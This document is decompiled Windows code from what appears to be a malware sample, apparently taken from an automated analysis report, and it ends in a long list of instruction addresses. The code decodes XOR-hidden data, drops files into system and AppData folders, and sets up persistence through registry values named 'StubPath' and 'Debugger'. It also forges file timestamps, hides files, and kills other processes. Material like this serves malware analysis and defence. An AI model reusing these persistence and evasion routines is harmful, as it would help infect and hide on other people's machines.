															}
															goto L175;
														}
													}
													_t952 =  &(_t970[0x16a]);
													_push(_t952);
													_push(0);
													_push(0x411040);
													_push(_t843);
													L00405E90();
													__eflags = _t453;
													if(_t453 == 0) {
														goto L167;
													}
													_push(0);
													_push(0x80);
													_push(2);
													_push(0);
													_push(0);
													_push(0x40000000);
													_push(_t952);
													L00405DB0();
													_t970[0x28] = _t453;
													__eflags = _t453;
													if(_t453 == 0) {
														goto L167;
													}
													__eflags = _t453 + 1;
													if(_t453 + 1 != 0) {
														goto L172;
													}
													goto L167;
												}
												RegDeleteValueA(_t446, "SubshellState");
												RegCloseKey(_t970[0x26]);
												_t953 =  &(_t970[0x1ee]);
												_t924 =  &(_t970[0x162]);
												_t894 =  &(_t970[0x278]);
												while(1) {
													__eflags = _t953 - _t894;
													if(_t953 >= _t894) {
														break;
													}
													_t687 = _t970[0x1ee] & 0x000000ff ^  *_t953;
													_t953 =  &(_t953[0]);
													 *_t924 = _t687;
													_t924 =  &(_t924[1]);
												}
												_push( *0x4120b0);
												_t666 =  &(_t970[0x163]);
												_push(_t666);
												L00405E50();
												__eflags = _t666;
												if(_t666 != 0) {
													L142:
													_t864 =  &(_t970[0x16b]);
													SetFileAttributesA(_t864, 0x80);
													DeleteFileA(_t864);
													goto L156;
												}
												_push( &(_t970[0x55a]));
												_t670 =  &(_t970[0x1ac]);
												_push(_t670);
												L00405E50();
												__eflags = _t670;
												if(_t670 == 0) {
													_t672 = CreateFileA( &(_t970[0x170]), 0x80000000, 1, 0, 3, 0, 0);
													_t970[0x28] = _t672;
													__eflags = _t672;
													if(_t672 == 0) {
														goto L142;
													}
													__eflags = _t672 - 0xffffffff;
													if(_t672 == 0xffffffff) {
														goto L142;
													}
													_t673 = GetFileSize(_t672, 0);
													_t970[0x1d] = _t673;
													__eflags = _t673 - _t966;
													if(_t673 == _t966) {
														_t676 = E00401000(_t966);
														_t954 = _t676;
														ReadFile(_t970[0x2c], _t676, _t966,  &(_t970[0x28]), 0);
														_t865 = _t970[0x1d];
														_t925 = _t954;
														_t938 = _t970[5];
														__eflags = _t954 - _t954 + _t865;
														while(__eflags < 0) {
															_t895 =  *_t925 & 0x000000ff;
															__eflags = _t970[0x162] - ( *_t938 & 0x000000ff);
															if(__eflags == 0) {
																__eflags = _t895;
															}
															if(__eflags == 0) {
																_t925 =  &(_t925[1]);
																_t938 =  &(_t938[1]);
																__eflags = _t925 - _t954 + _t865;
																continue;
															} else {
																E00401029(_t954);
																goto L146;
															}
														}
														E00401029(_t954);
														goto L175;
													}
													L146:
													CloseHandle(_t970[0x28]);
												}
												goto L142;
											}
											_t866 =  &(_t970[0x3cb]);
											_t688 = GetSystemDirectoryA(_t866, 0x104);
											_push( *0x412090);
											_push(0x41103e);
											_push(_t866);
											L00405E30();
											_push(_t688);
											L00405E30();
											_t689 = 0x407260;
											while(1) {
												__eflags = _t689 - 0x407286;
												if(_t689 >= 0x407286) {
													break;
												}
												 *_t689 =  *_t689 ^ 0x000000d4;
												_t689 =  &(_t689[1]);
											}
											_t690 = CreateMutexA(0, 0, "h`r@");
											_t970[0x28] = _t690;
											__eflags = _t690;
											if(_t690 == 0) {
												Sleep(0x7d0);
											} else {
												WaitForSingleObject(_t690, 0x2710);
												CloseHandle(_t970[0x28]);
											}
											_t867 =  &(_t970[0x3cb]);
											SetFileAttributesA(_t867, 0x80);
											_t692 = CreateFileA(_t867, 0x40000000, 0, 0, 2, 0x80, 0);
											_t970[0x28] = _t692;
											__eflags = _t692;
											if(_t692 == 0) {
												L135:
												RegCloseKey(_t970[0x26]);
												RegDeleteKeyA(0x80000001,  &(_t970[0x40e]));
												goto L136;
											} else {
												__eflags = _t692 - 0xffffffff;
												if(_t692 == 0xffffffff) {
													goto L135;
												}
												WriteFile(_t692, 0x4072a0, 0x800,  &(_t970[0x28]), 0);
												_t697 = E004010B2();
												_t970[6] = _t697;
												__eflags = _t697;
												if(_t697 == 0) {
													_t970[6] = 0xc6;
												}
												_t699 = E00401000(_t966 + 0x64);
												 *((char*)(_t699 + _t966)) = 0;
												_t939 = _t699;
												_t955 = _t699;
												_t927 = _t970[5];
												_t700 = _t699 + _t966;
												while(1) {
													__eflags = _t955 - _t700;
													if(_t955 >= _t700) {
														break;
													}
													_t725 = _t970[6] & 0x000000ff ^  *_t927;
													_t927 =  &(_t927[0]);
													 *_t955 = _t725;
													_t955 = _t955 + 1;
													_t700 = _t939 + _t966;
												}
												_t701 =  &(_t970[0x55a]);
												_t868 = _t939 + _t966;
												_push(_t701);
												L00405E40();
												_t956 = _t868 +  &(_t701[1]);
												__eflags = _t956 - _t868 + 0x64;
												while(__eflags < 0) {
													 *_t956 = E004010B2();
													_t956 = _t956 + 1;
													_t179 = _t966 + 0x64; // 0x64
													__eflags = _t956 - _t939 + _t179;
												}
												 *(_t939 + _t966 + 1) = _t966;
												_t870 = _t939 + _t966;
												_push( &(_t970[0x55a]));
												_t957 = _t870;
												_push( &(_t870[1]));
												L00405E20();
												_t704 =  &(_t870[0x19]);
												while(1) {
													__eflags = _t957 - _t704;
													if(_t957 >= _t704) {
														break;
													}
													 *_t957 =  *_t957 ^ _t970[6] & 0x000000ff;
													_t957 =  &(_t957[0]);
													_t188 = _t966 + 0x64; // 0x64
													_t704 = _t939 + _t188;
												}
												WriteFile(_t970[0x2c], _t939, _t966 + 0x64,  &(_t970[0x28]), 0);
												E00401029(_t939);
												__eflags = _t970[3];
												if(_t970[3] != 0) {
													SetFileTime(_t970[0x2b],  &(_t970[0x21]),  &(_t970[0x22]),  &(_t970[0x23]));
												}
												CloseHandle(_t970[0x28]);
												_t871 =  &(_t970[0x3d0]);
												CreateFileA(_t871, 0x80000000, 1, 0, 3, 0, 0);
												E00401251(_t970[0x26]);
												_t970[0x27] = 1;
												_t714 = RegSetValueExA(_t970[0x2b], "IsInstalled", 0, 4,  &(_t970[0x28]), 4);
												_push(_t871);
												L00405E40();
												_t715 = _t714 + 1;
												__eflags = _t715;
												RegSetValueExA(_t970[0x2b], "StubPath", 0, 1, _t871, _t715);
												_t970[0xa] = 1;
												goto L135;
											}
										}
										__eflags =  *((char*)(_t969 + 0x1e8));
										if( *((char*)(_t969 + 0x1e8)) != 0) {
											_push(_t841);
											_t728 = _t969 + 0x1bc;
											_push(_t728);
											L00405E20();
											while(1) {
												_t872 = _t969 + 0x1b8;
												_push(_t872);
												L00405E40();
												__eflags = _t728 - 0xf;
												if(_t728 > 0xf) {
													goto L105;
												}
												_t728 = _t969 + 0x1e8;
												_push(_t728);
												_push(_t872);
												L00405E30();
											}
											goto L105;
										}
										goto L101;
									}
									_t730 = RegCreateKeyA(0x80000002, 0x408720, _t969 + 0x98);
									__eflags = _t730;
									if(_t730 != 0) {
										goto L99;
									}
									_t873 = _t969 + 0x123c;
									_t731 = GetSystemDirectoryA(_t873, 0x104);
									_push( *0x4120a0);
									_push(0x41103e);
									_push(_t873);
									L00405E30();
									_push(_t731);
									L00405E30();
									_t732 = 0x407ae0;
									while(1) {
										__eflags = _t732 - 0x407b06;
										if(_t732 >= 0x407b06) {
											break;
										}
										 *_t732 =  *_t732 ^ 0x000000d4;
										_t732 =  &(_t732[1]);
									}
									_t733 = CreateMutexA(0, 0, 0x407ae0);
									 *(_t969 + 0xa0) = _t733;
									__eflags = _t733;
									if(_t733 == 0) {
										Sleep(0x7d0);
									} else {
										WaitForSingleObject(_t733, 0x2710);
										CloseHandle( *(_t969 + 0xa0));
									}
									_t874 = _t969 + 0x123c;
									SetFileAttributesA(_t874, 0x80);
									_t735 = CreateFileA(_t874, 0x40000000, 0, 0, 2, 0x80, 0);
									 *(_t969 + 0xa0) = _t735;
									__eflags = _t735;
									if(_t735 == 0) {
										L98:
										RegCloseKey( *(_t969 + 0x98));
										goto L99;
									} else {
										__eflags = _t735 - 0xffffffff;
										if(_t735 == 0xffffffff) {
											goto L98;
										}
										WriteFile(_t735, 0x407b20, 0xc00, _t969 + 0xa0, 0);
										_t738 = E004010B2();
										 *(_t969 + 0x1b) = _t738;
										__eflags = _t738;
										if(_t738 == 0) {
											 *(_t969 + 0x1b) = 0x66;
										}
										_t740 = E00401000(_t966 + 0x64);
										 *((char*)(_t740 + _t966)) = 0;
										_t940 = _t740;
										_t958 = _t740;
										_t930 =  *(_t969 + 0x14);
										_t741 = _t740 + _t966;
										while(1) {
											__eflags = _t958 - _t741;
											if(_t958 >= _t741) {
												break;
											}
											_t765 =  *(_t969 + 0x1b) & 0x000000ff ^  *_t930;
											_t930 =  &(_t930[0]);
											 *_t958 = _t765;
											_t958 = _t958 + 1;
											_t741 = _t940 + _t966;
										}
										_t742 = _t969 + 0x1568;
										_t875 = _t940 + _t966;
										_push(_t742);
										L00405E40();
										_t959 = _t875 + _t742 + 5;
										__eflags = _t959 - _t875 + 0x64;
										while(__eflags < 0) {
											 *_t959 = E004010B2();
											_t959 = _t959 + 1;
											_t107 = _t966 + 0x64; // 0x64
											__eflags = _t959 - _t940 + _t107;
										}
										 *(_t940 + _t966 + 1) = _t966;
										_t877 = _t940 + _t966;
										_push(_t969 + 0x1568);
										_t960 = _t877;
										_push( &(_t877[1]));
										L00405E20();
										_t745 =  &(_t877[0x19]);
										while(1) {
											__eflags = _t960 - _t745;
											if(_t960 >= _t745) {
												break;
											}
											 *_t960 =  *_t960 ^  *(_t969 + 0x1b) & 0x000000ff;
											_t960 =  &(_t960[0]);
											_t116 = _t966 + 0x64; // 0x64
											_t745 = _t940 + _t116;
										}
										WriteFile( *(_t969 + 0xb0), _t940, _t966 + 0x64, _t969 + 0xa0, 0);
										E00401029(_t940);
										__eflags =  *(_t969 + 0xc);
										if( *(_t969 + 0xc) != 0) {
											SetFileTime( *(_t969 + 0xac), _t969 + 0x84, _t969 + 0x88, _t969 + 0x8c);
										}
										CloseHandle( *(_t969 + 0xa0));
										_t878 = _t969 + 0x1250;
										CreateFileA(_t878, 0x80000000, 1, 0, 3, 0, 0);
										RegDeleteValueA( *(_t969 + 0x9c), "Debugger");
										_t754 = E00401251( *(_t969 + 0x98));
										_push(_t878);
										L00405E40();
										_t755 = _t754 + 1;
										__eflags = _t755;
										RegSetValueExA( *(_t969 + 0xac), "Debugger", 0, 1, _t878, _t755);
										 *(_t969 + 0x2c) = 1;
										goto L98;
									}
								}
								__eflags = _t414 - 0xffffffff;
								if(_t414 == 0xffffffff) {
									goto L66;
								}
								_t966 = GetFileSize(_t414, 0);
								 *(_t969 + 0x14) = E00401000(_t768);
								ReadFile( *(_t969 + 0xb0),  *(_t969 + 0x20), _t966, _t969 + 0xa0, 0);
								CloseHandle( *(_t969 + 0xa0));
								goto L67;
							} else {
								_t880 = _t969 + 0x145c;
								_t778 = GetSystemDirectoryA(_t880, 0x100);
								_push( *0x4120b0);
								_push(0x41103e);
								_push(_t880);
								L00405E30();
								L00405E30();
								_t961 = _t969 + 0x1568;
								_t780 = E004010F7(_t969 + 0x1568, _t880, _t778);
								__eflags = _t780;
								if(_t780 != 0) {
									L51:
									__eflags =  *(_t969 + 0x20);
									if( *(_t969 + 0x20) != 0) {
										_t793 = CreateFileA(_t969 + 0x1470, 0x40000000, 0, 0, 3, 0, 0);
										__eflags = _t793;
										_t883 = _t793;
										if(_t793 != 0) {
											__eflags = _t793 - 0xffffffff;
											if(_t793 != 0xffffffff) {
												SetFilePointer(_t793, 0xfffffff0, 0, 2);
												WriteFile(_t883, 0x4120e0, 4, _t969 + 0xa0, 0);
												CloseHandle(_t883);
											}
										}
									}
									__eflags =  *(_t969 + 0xc);
									if( *(_t969 + 0xc) != 0) {
										_t786 = CreateFileA(_t969 + 0x1470, 0x80000100, 1, 0, 3, 0, 0); // executed
										__eflags = _t786;
										_t882 = _t786;
										if(_t786 != 0) {
											__eflags = _t786 - 0xffffffff;
											if(_t786 != 0xffffffff) {
												SetFileTime(_t882, _t969 + 0x84, _t969 + 0x88, _t969 + 0x8c); // executed
												CloseHandle(_t882);
											}
										}
									}
									_t962 = _t969 + 0x145c;
									SetFileAttributesA(_t962, 0x21); // executed
									CloseHandle( *(_t969 + 0x10));
									_t881 = _t969 + 0xb28;
									GetStartupInfoA(_t881);
									_push(_t969 + 0xb18);
									_push(_t881);
									_push(0);
									_push(0);
									_push(0);
									_push(0);
									_push(0);
									_push(0);
									_push(0);
									_push(_t962); // executed
									CreateProcessA(); // executed
									L61:
									ExitProcess(0); // executed
									L62:
									 *0x412000 = 1;
									goto L63;
								}
								_push(0x104);
								_push(_t880);
								_push( *0x4120b0);
								_push("%CommonProgramFiles%\\System\\");
								_t941 = _t969 + 0x1358;
								L00405E20();
								L00405E30();
								_t798 = ExpandEnvironmentStringsA(_t780, _t780, _t941);
								__eflags = _t798;
								if(_t798 == 0) {
									L49:
									_push(0x104);
									_push(_t880);
									_push( *0x4120b0);
									_push("%AppData%\\");
									L00405E20();
									L00405E30();
									_t799 = ExpandEnvironmentStringsA(_t798, _t798, _t941);
									__eflags = _t799;
									if(_t799 == 0) {
										goto L62;
									}
									_t801 = E004010F7(_t961, _t880);
									__eflags = _t801;
									if(_t801 == 0) {
										goto L62;
									}
									goto L51;
								}
								_t798 = E004010F7(_t961, _t880);
								__eflags = _t798;
								if(_t798 != 0) {
									goto L51;
								}
								goto L49;
							}
						}
						_t823 = E004030DE(_t969 + 0x1f8);
						 *(_t969 + 4) = _t823;
						if(_t823 == 0) {
							L8:
							_t824 = GetCurrentProcessId();
							 *(_t969 + 0x428) = 0x128;
							_t884 = _t824;
							_t942 = 0;
							__eflags = 0;
							_t826 = Process32First(_t968, _t969 + 0x428);
							while(1) {
								__eflags = _t826;
								if(_t826 == 0) {
									break;
								}
								__eflags =  *(_t969 + 0x430) - _t884;
								if( *(_t969 + 0x430) == _t884) {
									L15:
									_t826 = Process32Next(_t968, _t969 + 0x428);
									continue;
								}
								_push( *0x4120b0);
								_t836 = E004010DC(_t969 + 0x450);
								_push(_t836);
								_t964 = _t836;
								L00405E50();
								__eflags = _t836;
								if(_t836 == 0) {
									L13:
									_t837 = OpenProcess(0x100201, 0,  *(_t969 + 0x430));
									 *(_t969 + 0x558 + _t942 * 4) = _t837;
									__eflags = _t837;
									if(_t837 == 0) {
										goto L15;
									}
									_t942 = _t942 + 1;
									__eflags = _t942 - 9;
									if(_t942 > 9) {
										break;
									}
									goto L15;
								}
								_push("winrnt.exe");
								_push(_t964);
								L00405E50();
								__eflags = _t836;
								if(_t836 != 0) {
									goto L15;
								}
								goto L13;
							}
							_t885 = 0;
							__eflags = 0;
							CloseHandle(_t968);
							goto L17;
							L21:
							__eflags = _t886 - _t942;
							if(_t886 < _t942) {
								_t886 = _t886 + 1;
								TerminateProcess( *(_t969 + 0x55c + _t886 * 4), 0);
								goto L21;
							}
							_t963 = _t963 - 1;
							__eflags = _t963;
							if(_t963 >= 0) {
								L20:
								_t886 = 0;
								__eflags = 0;
								goto L21;
							} else {
								_t887 = 0;
								__eflags = 0;
								goto L25;
								L25:
								__eflags = _t887 - _t942;
								if(_t887 >= _t942) {
									__eflags =  *(_t969 + 4);
									if( *(_t969 + 4) != 0) {
										_t888 = _t969 + 0x21e;
										SetFileAttributesA(_t888, 0x80);
										DeleteFileA(_t888);
									}
									goto L29;
								} else {
									WaitForSingleObject( *(_t969 + 0x55c + _t887 * 4), 0x1388);
									_t887 = _t887 + 1;
									CloseHandle( *(_t969 + 0x558 + _t887 * 4));
									goto L25;
								}
							}
							L17:
							__eflags = _t885 - _t942;
							if(_t885 >= _t942) {
								_t963 = 4;
								goto L20;
							} else {
								_t885 = _t885 + 1;
								SetPriorityClass( *(_t969 + 0x55c + _t885 * 4), 0x40);
								goto L17;
							}
						} else {
							RegDeleteValueA(_t823, "SubshellState");
							RegCloseKey( *(_t969 + 4));
							_t965 = _t969 + 0x21a;
							_t936 = _t969 + 0x31e;
							L6:
							if(_t965 < _t936) {
								 *_t965 =  *_t965 ^  *(_t969 + 0x1f8) & 0x000000ff;
								_t965 =  &(_t965[0]);
								goto L6;
							}
							goto L8;
						}
					}
				}
			}

0x00000000
0x00403ff5
0x00403ff5
0x00403ffa
0x0040425a
0x0040425f
0x00000000
0x00000000
0x00404267
0x00000000
0x00404000
0x00404000
0x00404004
0x0040400b
0x0040400d
0x0040416b
0x0040416b
0x00404170
0x0040418f
0x00404194
0x00404196
0x0040419c
0x004041c8
0x004041cd
0x004041cf
0x004041d1
0x004041f9
0x004041fe
0x00404200
0x00404219
0x0040421e
0x00404220
0x00404220
0x00404226
0x00404226
0x00404231
0x00404236
0x0040423b
0x00404247
0x00404247
0x0040423b
0x00404253
0x00404253
0x00404196
0x00404275
0x00404275
0x00404279
0x0040427e
0x0040427e
0x00403fb2
0x00403fc0
0x00403fd1
0x00403fd6
0x00403fda
0x00403fdd
0x00403fef
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0040426e
0x0040426e
0x0040426e
0x0040428c
0x00404299
0x0040429e
0x004042a0
0x004042b2
0x004042b7
0x004042be
0x004042c1
0x004042c3
0x004042de
0x004042ea
0x004042ef
0x004042ef
0x004042c3
0x004042f7
0x004042fc
0x004044af
0x004044c6
0x004044cb
0x004044d2
0x004044d4
0x00404517
0x00404517
0x0040451f
0x0040451f
0x00404521
0x00404545
0x0040454a
0x0040454f
0x0040454f
0x00404554
0x00000000
0x00000000
0x00404556
0x00404559
0x00404559
0x00404561
0x00404561
0x00404566
0x00000000
0x00000000
0x00404568
0x00404568
0x00404569
0x00404569
0x0040456e
0x00404575
0x004047c9
0x004047c9
0x004047d6
0x004047de
0x004047e3
0x004047e5
0x004047f1
0x004047f1
0x004047fd
0x004047fe
0x00404835
0x004048cf
0x004048d4
0x004048d7
0x004048dc
0x004048dc
0x004048e1
0x00000000
0x00000000
0x004048e3
0x004048e6
0x004048e6
0x004048ee
0x004048ee
0x004048f3
0x00000000
0x00000000
0x004048f5
0x004048f5
0x004048f6
0x004048f6
0x004048fb
0x00404900
0x00404905
0x0040490c
0x0040490d
0x00404912
0x00404913
0x00404926
0x0040492b
0x0040492d
0x00404b8d
0x00404b94
0x00404b99
0x00404ba0
0x00404ba2
0x00404ce5
0x00404ce5
0x00404cea
0x00404cec
0x00404cee
0x00404cf0
0x00404cf0
0x00404cf2
0x00404cf9
0x00404cfe
0x00404d00
0x00404d02
0x00404d04
0x00404d04
0x00404d06
0x00404d0d
0x00404d1a
0x00404d1b
0x00404d27
0x00404d2f
0x00404d30
0x00404d35
0x00404d39
0x00404d3c
0x00404d3c
0x00404d3e
0x00000000
0x00000000
0x00404d48
0x00404d4a
0x00404d4f
0x00404d4f
0x00404d58
0x00404d65
0x00404d6a
0x00404d6c
0x00404dad
0x00404dad
0x00404dba
0x00404dbf
0x00404dc1
0x00404e76
0x00404e7a
0x00404e84
0x00404e8c
0x00404e91
0x00404e96
0x00404e9c
0x00404ea1
0x00404ea2
0x00404ea8
0x00404eae
0x00404ec6
0x00404ecb
0x00404ed2
0x00404ed4
0x00404f78
0x00404f78
0x00404f7d
0x00404f80
0x00404fa3
0x00404fb0
0x00404fb5
0x00404fba
0x00404fc1
0x00404fc7
0x00404fdf
0x00404fe4
0x00404feb
0x00404fed
0x00404ff6
0x00404ff6
0x00404ffb
0x00404ffe
0x00000000
0x00000000
0x00405006
0x0040500b
0x00405010
0x00405017
0x0040501d
0x00405035
0x0040503a
0x00405041
0x00405043
0x0040504c
0x0040504c
0x00405051
0x00405054
0x00000000
0x00000000
0x00405080
0x00405085
0x00405092
0x00405097
0x0040509c
0x004050a3
0x004050a9
0x004050c1
0x004050c6
0x004050cd
0x004050cf
0x004050d1
0x004050d8
0x004050d8
0x004050e5
0x004050ea
0x004050ef
0x004050f6
0x004050fc
0x00405114
0x00405119
0x00405120
0x00405122
0x00405124
0x00405153
0x00405153
0x0040515b
0x0040515b
0x00405163
0x0040517c
0x0040517c
0x00405186
0x0040518e
0x00405193
0x00405198
0x00405199
0x004051a0
0x004051b0
0x004051b7
0x004051c7
0x004051ce
0x004051d3
0x004051d8
0x004051d8
0x004051dd
0x00000000
0x00000000
0x004051df
0x004051e2
0x004051e2
0x004051fe
0x00405203
0x00405205
0x00405229
0x00405229
0x0040522e
0x00405237
0x0040523e
0x00405243
0x00405244
0x00405249
0x00405249
0x0040525d
0x0040525d
0x0040526e
0x0040527a
0x0040527f
0x0040527f
0x00405286
0x004054f1
0x0040550f
0x00405514
0x00405519
0x00405519
0x0040551e
0x00000000
0x00000000
0x00405520
0x00405523
0x00405523
0x00405526
0x0040552e
0x00405538
0x0040553d
0x00405542
0x00000000
0x00000000
0x00405548
0x00405550
0x00405558
0x0040555d
0x0040555f
0x004057d5
0x004057d5
0x004057f2
0x004057f2
0x004057fa
0x004057fa
0x00405802
0x00405804
0x00405806
0x0040580b
0x00405810
0x00405815
0x0040581a
0x0040581f
0x0040582c
0x00405831
0x00405831
0x00405834
0x00405839
0x00405841
0x00405849
0x00405863
0x00405868
0x0040586a
0x00405873
0x00405878
0x0040589d
0x004058a2
0x004058a3
0x004058a8
0x004058a8
0x004058bb
0x004058c7
0x004058c7
0x0040586a
0x004058cc
0x004058d1
0x004058d8
0x00405933
0x00405938
0x0040593a
0x00405957
0x00405957
0x0040595e
0x0040595f
0x00405964
0x00405964
0x00405965
0x00405966
0x00405967
0x00405969
0x0040596b
0x00000000
0x0040596b
0x0040594e
0x00405953
0x00405955
0x00000000
0x00000000
0x00000000
0x004058da
0x004058dc
0x004058e4
0x004058f4
0x004058f9
0x004058fb
0x00405989
0x00405989
0x0040598e
0x00000000
0x00000000
0x00405996
0x004059b8
0x004059bd
0x004059bf
0x004059e7
0x00405a04
0x00405a10
0x00405a15
0x00405a17
0x00405a1f
0x00405a24
0x00405a2b
0x00405a32
0x00405a9f
0x00405aa4
0x00405aa6
0x00000000
0x00000000
0x00405aa8
0x00405aa9
0x00405abe
0x00405ada
0x00405ae6
0x00405af6
0x00405afb
0x00405afd
0x00000000
0x00000000
0x00405aff
0x00405b06
0x00000000
0x00405b06
0x00405a3f
0x00405a44
0x00405a46
0x00000000
0x00000000
0x00405a53
0x00405a58
0x00405a59
0x00405a71
0x00405a8d
0x00000000
0x00405a8d
0x004059de
0x004059e3
0x004059e5
0x00000000
0x00000000
0x00000000
0x004059e5
0x00405908
0x0040590d
0x0040590e
0x00405914
0x00405915
0x00405916
0x00405918
0x0040591a
0x00405971
0x00405978
0x00405984
0x00000000
0x00405984
0x00405b0b
0x00405b15
0x00405b1f
0x00405b24
0x00405b24
0x00405b24
0x00405b24
0x00405b4c
0x00405b51
0x00405b53
0x00405b59
0x00405b66
0x00405b78
0x00405b7d
0x00405b7f
0x00405b85
0x00405b86
0x00405b88
0x00405b8c
0x00405bae
0x00405bb8
0x00405bbd
0x00405bc4
0x00405be5
0x00405bc6
0x00405bd1
0x00405bd9
0x00405bd9
0x00405b8e
0x00405b9e
0x00405b9e
0x00405b8c
0x00405bee
0x00405bee
0x00000000
0x00405b53
0x00405583
0x00405588
0x0040558a
0x004057de
0x004057e2
0x00000000
0x00000000
0x004057e4
0x004057e4
0x00000000
0x004057e4
0x00405590
0x00405595
0x0040559a
0x004055a7
0x004055bf
0x004055c4
0x004055c6
0x004055dc
0x004055e8
0x004055ed
0x00405669
0x00405669
0x00405670
0x004056a9
0x004056a9
0x004056cf
0x004056d1
0x004056e7
0x004056e7
0x004056ec
0x004056ee
0x004057cc
0x004057d0
0x00000000
0x004057d0
0x004056f4
0x004056fd
0x004056ff
0x00405705
0x00405708
0x0040572b
0x0040572b
0x00405738
0x00405750
0x00405755
0x00405757
0x00405761
0x00405761
0x00405766
0x00405769
0x0040576d
0x0040576d
0x0040577c
0x00405781
0x00000000
0x00405783
0x00405783
0x00405788
0x0040578a
0x00000000
0x00000000
0x0040578c
0x00405795
0x00405797
0x0040579d
0x004057a0
0x00000000
0x00000000
0x004057a2
0x004057a4
0x004057a5
0x004057a7
0x004057a9
0x004057ae
0x004057b5
0x004057be
0x004057c3
0x00000000
0x004057c3
0x00405781
0x00405712
0x00405716
0x0040571a
0x0040571c
0x0040571d
0x0040571f
0x00405721
0x00000000
0x00405721
0x004056e0
0x004056e5
0x00000000
0x00000000
0x00000000
0x004056e5
0x00405672
0x0040567b
0x0040567d
0x00405683
0x00405686
0x00000000
0x00000000
0x00405690
0x00405694
0x00405698
0x0040569a
0x0040569b
0x0040569d
0x0040569f
0x00000000
0x0040569f
0x004055ef
0x004055f4
0x004055f6
0x00000000
0x00000000
0x00405605
0x0040560b
0x0040560d
0x0040560f
0x00405611
0x00405619
0x0040561f
0x00405622
0x00405624
0x00405624
0x00405622
0x0040562a
0x0040562f
0x00405631
0x0040565f
0x00405633
0x0040563b
0x00405640
0x00405642
0x00405647
0x0040564d
0x0040564f
0x00405654
0x00405656
0x00405656
0x00405654
0x00405658
0x00405658
0x00000000
0x00405631
0x004055cc
0x004055d1
0x004055d6
0x00000000
0x00000000
0x00000000
0x004057ee
0x004057ee
0x004057ee
0x004057ee
0x00000000
0x004057ee
0x0040552e
0x0040528c
0x00405291
0x00405291
0x00405296
0x00000000
0x00000000
0x00405298
0x0040529b
0x0040529b
0x0040529e
0x004052a3
0x004052a3
0x004052a8
0x00000000
0x00000000
0x004052aa
0x004052ad
0x004052ad
0x004052b0
0x004052c2
0x004052c7
0x004052c9
0x004052e5
0x004052f1
0x004052f1
0x004052f6
0x004052fb
0x004052fb
0x00405300
0x00000000
0x00000000
0x00405302
0x00405305
0x00405305
0x00405308
0x0040530d
0x0040530d
0x00405312
0x00000000
0x00000000
0x00405314
0x00405317
0x00405317
0x0040531a
0x0040531f
0x0040531f
0x00405324
0x00000000
0x00000000
0x00405326
0x00405329
0x00405329
0x0040532c
0x00405331
0x00405331
0x00405336
0x00000000
0x00000000
0x00405338
0x0040533b
0x0040533b
0x0040533e
0x00405343
0x00405343
0x00405348
0x00000000
0x00000000
0x0040534a
0x0040534d
0x0040534d
0x00405362
0x00405367
0x00405369
0x0040536d
0x00405385
0x0040539d
0x004053b5
0x004053cd
0x004053d9
0x004053d9
0x004053de
0x004053e3
0x004053e3
0x004053e8
0x00000000
0x00000000
0x004053ea
0x004053ed
0x004053ed
0x00405402
0x00405407
0x00405409
0x00000000
0x00000000
0x00405413
0x00405418
0x00405420
0x00405422
0x00405427
0x00405432
0x00405432
0x00405437
0x00000000
0x00000000
0x00405439
0x0040543c
0x0040543c
0x0040543f
0x00405484
0x00405488
0x00405488
0x004054ab
0x004054b0
0x004054b2
0x00000000
0x00000000
0x00405449
0x0040544e
0x00405457
0x0040545c
0x0040545e
0x00405468
0x00405468
0x0040545e
0x0040546d
0x0040546d
0x0040546d
0x00405471
0x00405479
0x00405479
0x004054b4
0x004054c7
0x004054c7
0x004054c8
0x004054d9
0x004054e0
0x004054ec
0x00000000
0x004054ec
0x00405220
0x00405225
0x00405227
0x00000000
0x00000000
0x00000000
0x00405227
0x00405126
0x00405129
0x00000000
0x00000000
0x0040512b
0x00405140
0x0040514c
0x00000000
0x0040514c
0x004050d3
0x004050d6
0x00000000
0x00000000
0x00000000
0x004050d6
0x00405045
0x00405046
0x00404ee1
0x00404efc
0x00404f01
0x00404f06
0x00404f27
0x00404f27
0x00404f33
0x00404f38
0x00404f40
0x00404f42
0x00404f47
0x00404f4f
0x00404f54
0x00404f57
0x00404f59
0x00404f5b
0x00404f5d
0x00404f63
0x00404f68
0x00404f68
0x00404f6b
0x00404f6d
0x00404f72
0x0040505c
0x0040505c
0x00405061
0x0040507b
0x00000000
0x0040507b
0x00000000
0x00405046
0x00404fef
0x00404ff0
0x00000000
0x00000000
0x00000000
0x00404ff0
0x00404f82
0x00404f82
0x00404f8a
0x00404f8c
0x00404f98
0x00000000
0x00404f98
0x00404eda
0x00404edb
0x00000000
0x00000000
0x00000000
0x00404dc7
0x00404dc7
0x00404dd7
0x00404ddc
0x00404dde
0x00000000
0x00000000
0x00404df7
0x00404dfc
0x00404e03
0x00404e05
0x00000000
0x00000000
0x00404e07
0x00404e08
0x00000000
0x00000000
0x00404e0a
0x00404e20
0x00404e2c
0x00404e48
0x00404e4d
0x00404e54
0x00404e5b
0x00404e62
0x00404e62
0x00404e64
0x00000000
0x00000000
0x00404e6e
0x00404e70
0x00404e71
0x00404e73
0x00404e73
0x00000000
0x00404e62
0x00404dc1
0x00404d6e
0x00404d75
0x00404d76
0x00404d78
0x00404d7d
0x00404d7e
0x00404d83
0x00404d85
0x00000000
0x00000000
0x00404d87
0x00404d89
0x00404d8e
0x00404d90
0x00404d92
0x00404d94
0x00404d99
0x00404d9a
0x00404d9f
0x00404da6
0x00404da8
0x00000000
0x00000000
0x00404daa
0x00404dab
0x00000000
0x00000000
0x00000000
0x00404dab
0x00404bae
0x00404bba
0x00404bbf
0x00404bc6
0x00404bcd
0x00404bd4
0x00404bd4
0x00404bd6
0x00000000
0x00000000
0x00404be0
0x00404be2
0x00404be3
0x00404be5
0x00404be5
0x00404be8
0x00404bee
0x00404bf5
0x00404bf6
0x00404bfb
0x00404bfd
0x00404c18
0x00404c1d
0x00404c25
0x00404c2b
0x00000000
0x00404c2b
0x00404c06
0x00404c07
0x00404c0e
0x00404c0f
0x00404c14
0x00404c16
0x00404c4c
0x00404c51
0x00404c58
0x00404c5a
0x00000000
0x00000000
0x00404c5c
0x00404c5f
0x00000000
0x00000000
0x00404c64
0x00404c69
0x00404c6d
0x00404c6f
0x00404c8c
0x00404c92
0x00404c9b
0x00404ca0
0x00404ca4
0x00404ca6
0x00404cad
0x00404caf
0x00404cb4
0x00404cb7
0x00404cbe
0x00404cc3
0x00404cc3
0x00404cc5
0x00404cd0
0x00404cd4
0x00404cd5
0x00000000
0x00404cc7
0x00404cc9
0x00000000
0x00404cc9
0x00404cc5
0x00404cdb
0x00000000
0x00404cdb
0x00404c71
0x00404c78
0x00404c78
